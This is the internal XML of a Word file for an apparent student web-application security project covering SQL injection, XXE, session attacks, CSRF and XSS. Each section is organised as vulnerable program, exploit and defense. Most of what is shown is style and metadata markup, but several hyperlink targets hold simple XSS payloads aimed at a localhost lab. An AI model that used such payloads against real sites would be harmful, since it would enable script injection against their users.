    <w:name w:val="Titre Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre"/>
    <w:rsid w:val="008C5323"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:kern w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="4"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre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re4Car">
    <w:name w:val="Titre 4 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre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itre5Car">
    <w:name w:val="Titre 5 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre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ie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Normalcentr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  <w:ind w:firstLine="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Pr>
      <w:kern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/>
      <w:ind w:firstLine="0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Pr>
      <w:kern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F2002"/>
    <w:rPr>
      <w:kern w:val="24"/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Pr>
      <w:kern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 w:firstLine="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Pr>
      <w:kern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Pr>
      <w:kern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/>
      <w:ind w:left="360" w:firstLine="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Pr>
      <w:kern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F2002"/>
    <w:rPr>
      <w:kern w:val="24"/>
      <w:sz w:val="22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line="240" w:lineRule="auto"/>
      <w:ind w:left="4320" w:firstLine="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Pr>
      <w:kern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F2002"/>
    <w:rPr>
      <w:kern w:val="24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ar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DateCar">
    <w:name w:val="Date Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Date"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:kern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line="240" w:lineRule="auto"/>
      <w:ind w:firstLine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Pr>
      <w:kern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2002"/>
    <w:rPr>
      <w:kern w:val="24"/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002C0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PieddepageCar">
    <w:name w:val="Pied de page Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Pieddepage"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008002C0"/>
    <w:rPr>
      <w:kern w:val="24"/>
    </w:rPr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  <w:kern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itreindex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e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epuc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enum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um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um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um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edemacro">
    <w:name w:val="macro"/>
    <w:link w:val="Textede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pPr>
      <w:ind w:left="720" w:firstLine="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line="240" w:lineRule="auto"/>
      <w:ind w:firstLine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Pr>
      <w:kern w:val="24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color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern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pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SalutationsCar">
    <w:name w:val="Salutations Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Salutations"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:kern w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Signature">
    <w:name w:val="Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SignatureC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ar">
    <w:name w:val="Signature Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Signature"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:kern w:val="24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Appelnotedebasdep">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="5"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="RapportAPA">
    <w:name w:val="Rapport APA"/>
    <w:basedOn w:val="Tableau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auFigure">
    <w:name w:val="Tableau/Figure"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240"/>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tableausimple1">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="Tableau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F2002"/>
    <w:rPr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F2002"/>
    <w:rPr>
      <w:kern w:val="24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re20">
    <w:name w:val="Titre 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00B823AA"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauGrille1Clair-Accentuation4">
    <w:name w:val="Grid Table 1 Light Accent 4"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="001C2C1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E9591E"/>
    <w:rPr>
      <w:color w:val="5F5F5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hyperlink" Target="http://127.0.0.1/index.php?price=" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/index.php?price=%3cscript%3ealert(1)" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/index.php?price=1);alert(%22Code" TargetMode="External"/><Relationship Id="rId55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://127.0.0.1/Password%20Management/attack/?username=xx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127.0.0.1/index.php?price=1" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/index.php?price=javascript:alert(1)" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png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://127.0.0.1/index.php?price=%22%3e%3c/a%3e%3cscript%3ealert(1)" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/index.php?price=1);alert(%22Code" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:valerio.kevin83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3.png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5.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/index.php?price=red;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27.0.0.1/Password%20Management/attack/?username=xxx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Local\Microsoft\Office\16.0\DTS\fr-FR%7bA6B31616-DBFD-4AEB-9572-95FF0F30B791%7d\%7b41DF39BE-A518-4435-A752-0535B8BD9EF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9F0579434749DC8DE4B00974D85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0B1B85-6382-4EBA-8EBB-979E3DC144BB}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="0046769F" w:rsidRDefault="00D3385B">
          <w:pPr>
            <w:pStyle w:val="379F0579434749DC8DE4B00974D8506E"/>
          </w:pPr>
          <w:r w:rsidRPr="0028553F">
            <w:rPr>
              <w:lang w:bidi="fr-FR"/>
            </w:rPr>
            <w:t>Titre des figures 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5B"/>
    <w:rsid w:val="0046769F"/>
    <w:rsid w:val="0060286A"/>
    <w:rsid w:val="00D3385B"/>
    <w:rsid w:val="00D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369B47B62748B39D8C9FD91A824896">
    <w:name w:val="D1369B47B62748B39D8C9FD91A824896"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="95770722A9944F439FC10120971BCAE3">
    <w:name w:val="95770722A9944F439FC10120971BCAE3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="285CE75ED30D4E4A8C43945B7AB6C1AC">
    <w:name w:val="285CE75ED30D4E4A8C43945B7AB6C1AC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DC8386DD90D64000AD189DC893725769">
    <w:name w:val="DC8386DD90D64000AD189DC893725769"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E79E4430FB494192BFD0CEF5D5178264">
    <w:name w:val="E79E4430FB494192BFD0CEF5D5178264"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="46EC92117AF040FA86AB757CBB04ACEA">
    <w:name w:val="46EC92117AF040FA86AB757CBB04ACEA"/>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="4"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="59DD8D5A06AF461893B23CD8C6991CEF">
    <w:name w:val="59DD8D5A06AF461893B23CD8C6991CEF"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="56B607D5FF4C4F68910AD95D18950574">
    <w:name w:val="56B607D5FF4C4F68910AD95D18950574"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="04D99BB247034F7C9B65B81F36A7E568">
    <w:name w:val="04D99BB247034F7C9B65B81F36A7E568"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3B11E219A2F04490AC7A289B68F798BF">
    <w:name w:val="3B11E219A2F04490AC7A289B68F798BF"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AAF47B363EA742B5865F2477CC2D2C70">
    <w:name w:val="AAF47B363EA742B5865F2477CC2D2C70"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="55B7F35BA55149B99E2D4185C5C3F6B7">
    <w:name w:val="55B7F35BA55149B99E2D4185C5C3F6B7"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="08E615529082454D8F07B89BFD542036">
    <w:name w:val="08E615529082454D8F07B89BFD542036"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D839CBEB5F1C4CA3B4B80BDA0AAA01E4">
    <w:name w:val="D839CBEB5F1C4CA3B4B80BDA0AAA01E4"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E84E08CF8C0047AABE0705452FFCC274">
    <w:name w:val="E84E08CF8C0047AABE0705452FFCC274"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2342F44DA87B485785C01D7D61A8088E">
    <w:name w:val="2342F44DA87B485785C01D7D61A8088E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="23D6711C446641DF8DA5910A16764862">
    <w:name w:val="23D6711C446641DF8DA5910A16764862"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B210F300CCF34AC78A3ED2975262C97B">
    <w:name w:val="B210F300CCF34AC78A3ED2975262C97B"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1A3988E3114A4B4894E5E7EF47BE931C">
    <w:name w:val="1A3988E3114A4B4894E5E7EF47BE931C"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B94D833B6B7D4E7780CCDF1F5068C27E">
    <w:name w:val="B94D833B6B7D4E7780CCDF1F5068C27E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="9EDF340F6D4244E8B129A8A30F61DF1C">
    <w:name w:val="9EDF340F6D4244E8B129A8A30F61DF1C"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6A52B0CEC00045B78E8C55C953CF9A15">
    <w:name w:val="6A52B0CEC00045B78E8C55C953CF9A15"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4285906A048B4709B4DA09CB3F2FC3B9">
    <w:name w:val="4285906A048B4709B4DA09CB3F2FC3B9"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="79061DB81CC64C2684A66578F48D557A">
    <w:name w:val="79061DB81CC64C2684A66578F48D557A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11FB85B6BEBF4F638166F309190D7EDA">
    <w:name w:val="11FB85B6BEBF4F638166F309190D7EDA"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0A2997383C1848E1B632A1DF94E8D2FD">
    <w:name w:val="0A2997383C1848E1B632A1DF94E8D2FD"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7A69775F2AC04DF09C4D5CAB05592A14">
    <w:name w:val="7A69775F2AC04DF09C4D5CAB05592A14"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3B2CBF69ADE24DEB943650082FFF3A47">
    <w:name w:val="3B2CBF69ADE24DEB943650082FFF3A47"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32A3937933C74D96AB187EB88F43A5A3">
    <w:name w:val="32A3937933C74D96AB187EB88F43A5A3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FBAE73E6103641DF9416474ABE76153E">
    <w:name w:val="FBAE73E6103641DF9416474ABE76153E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E33AA23976C14B91BFDC0C0A9DA982AD">
    <w:name w:val="E33AA23976C14B91BFDC0C0A9DA982AD"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4739DC7D588847D882DD0E5A5D93B39D">
    <w:name w:val="4739DC7D588847D882DD0E5A5D93B39D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1FA0636DEE4449FF883F689D24892603">
    <w:name w:val="1FA0636DEE4449FF883F689D24892603"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A6EA7CE801CA490987602182E6B43BF9">
    <w:name w:val="A6EA7CE801CA490987602182E6B43BF9"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="45712A3ED3D245CCB429897678745378">
    <w:name w:val="45712A3ED3D245CCB429897678745378"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="9BE4780DCE3F4BE38A1F0054CA045DD5">
    <w:name w:val="9BE4780DCE3F4BE38A1F0054CA045DD5"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E35020AF7C8B43448EC299C293B6F541">
    <w:name w:val="E35020AF7C8B43448EC299C293B6F541"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E94922446F3E4F22AD598D4150674924">
    <w:name w:val="E94922446F3E4F22AD598D4150674924"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="304DF5A2725C46DA8D30150CD74986B4">
    <w:name w:val="304DF5A2725C46DA8D30150CD74986B4"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="790AB7B03D944D0CA5FC9778B65F52E6">
    <w:name w:val="790AB7B03D944D0CA5FC9778B65F52E6"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="72A9ADD1A0494DBAB9862396ED646699">
    <w:name w:val="72A9ADD1A0494DBAB9862396ED646699"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AFD5B1AF43CF452CBB6060954B5AB66C">
    <w:name w:val="AFD5B1AF43CF452CBB6060954B5AB66C"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6460EA0487BF4B65B072233EA0782A9B">
    <w:name w:val="6460EA0487BF4B65B072233EA0782A9B"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="94A1C10EDC594DC8926055A8D1AAF39E">
    <w:name w:val="94A1C10EDC594DC8926055A8D1AAF39E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7A39E5BC80564D7284CB3DED0A4770DF">
    <w:name w:val="7A39E5BC80564D7284CB3DED0A4770DF"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AD33959D62EB4E02A767B7C7C3D501E7">
    <w:name w:val="AD33959D62EB4E02A767B7C7C3D501E7"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EFBE2E0DE3874A68B898F5EB732CC699">
    <w:name w:val="EFBE2E0DE3874A68B898F5EB732CC699"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="56D7AEBA22F54ED189726F10CF2E2BCE">
    <w:name w:val="56D7AEBA22F54ED189726F10CF2E2BCE"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D45FC21E055A4E22B0CD3C39DB6EC4BC">
    <w:name w:val="D45FC21E055A4E22B0CD3C39DB6EC4BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="05FD50E287EB4DDEB2FD3FD8E59850D5">
    <w:name w:val="05FD50E287EB4DDEB2FD3FD8E59850D5"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7C7DF4BE889F4299AFF9092FD308944F">
    <w:name w:val="7C7DF4BE889F4299AFF9092FD308944F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="46E371C0363B4B07A678C6C815E4E567">
    <w:name w:val="46E371C0363B4B07A678C6C815E4E567"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0032D1E67041480A8FFA794242024C5A">
    <w:name w:val="0032D1E67041480A8FFA794242024C5A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E27075F30DDB463E9195AD862AE87CE7">
    <w:name w:val="E27075F30DDB463E9195AD862AE87CE7"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4914B843103B4BCEB899054777CA582F">
    <w:name w:val="4914B843103B4BCEB899054777CA582F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CC1E2D8949604272BA9D613AC1CC68B0">
    <w:name w:val="CC1E2D8949604272BA9D613AC1CC68B0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8ED231622C93405983B57DDF42931C3A">
    <w:name w:val="8ED231622C93405983B57DDF42931C3A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C8C85D4201BA4ED2B7C5F85255CFCEEB">
    <w:name w:val="C8C85D4201BA4ED2B7C5F85255CFCEEB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DF7088B598D94BEB88B618A1DC9E5B71">
    <w:name w:val="DF7088B598D94BEB88B618A1DC9E5B71"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="625D6F1D856C4DB9B33A60CE3F169E38">
    <w:name w:val="625D6F1D856C4DB9B33A60CE3F169E38"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EF4595F38B784DFAA5570E396AE4AD28">
    <w:name w:val="EF4595F38B784DFAA5570E396AE4AD28"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="379F0579434749DC8DE4B00974D8506E">
    <w:name w:val="379F0579434749DC8DE4B00974D8506E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EE9D5025A95E42CFB19CB8A4182FD3C3">
    <w:name w:val="EE9D5025A95E42CFB19CB8A4182FD3C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7BCAD9734419407C90B2B1F15C7C4ECC">
    <w:name w:val="7BCAD9734419407C90B2B1F15C7C4ECC"/>
    <w:rsid w:val="0046769F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0CB376AC2B6647B084B78C5B5267A4D1">
    <w:name w:val="0CB376AC2B6647B084B78C5B5267A4D1"/>
    <w:rsid w:val="00467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Sécurité des applications Web - Projet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{E20EFC3C-0319-47DA-A7AE-2D3BA3A7269B}</b:Guid>
    <b:Title>Titre de l’article</b:Title>
    <b:Year>Année</b:Year>
    <b:JournalName>Titre du journal</b:JournalName>
    <b:Pages>Pages de - à</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nom</b:Last>
            <b:First>prénom,</b:First>
            <b:Middle>deuxième prénom</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Last</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{BA5BFDF8-BBDC-4089-A360-3DA3B091A873}</b:Guid>
    <b:Title>Titre du livre</b:Title>
    <b:Year>Année</b:Year>
    <b:City>Nom de la ville</b:City>
    <b:Publisher>Nom de l’éditeur</b:Publisher>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nom</b:Last>
            <b:First>prénom,</b:First>
            <b:Middle>deuxième prénom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919A4-B289-43D6-8B5A-4632137A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{41DF39BE-A518-4435-A752-0535B8BD9EFB}tf03982351_win32.dotx</Template>
  <TotalTime>419</TotalTime>
  <Pages>17</Pages>
  <Words>725</Words>
  <Characters>3993</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>33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79</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="81" baseType="lpstr">
      <vt:lpstr>Kevin Valerio</vt:lpstr>
      <vt:lpstr>    Password management  </vt:lpstr>
      <vt:lpstr>        /Vulnerable program </vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        /Defense system</vt:lpstr>
      <vt:lpstr>    SQL Injection  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    XML External Entity </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        /Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Session Management (part one, session stealing)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Session Management (part two, bad session ID entropy)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Session Management (part three, CSRF)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    DOM-based XSS </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 0 (in commentary)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 1 (in HTML)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 2 (in attributes)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 3 (in attributes)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 4 (in CSS)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 5 (in href)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 6 (allowed HTML but disallowed JS)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 7 (in JS URLs)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr>
      <vt:lpstr>    Cross-site scripting (XSS) – 8 (in href)  </vt:lpstr>
      <vt:lpstr>        Vulnerable program</vt:lpstr>
      <vt:lpstr>        /</vt:lpstr>
      <vt:lpstr>        Exploit</vt:lpstr>
      <vt:lpstr>        Defense system</vt:lpstr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Valerio</dc:title>
  <dc:subject/>
  <dc:creator>K .</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kevin VALERIO</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-26T10:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-27T21:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>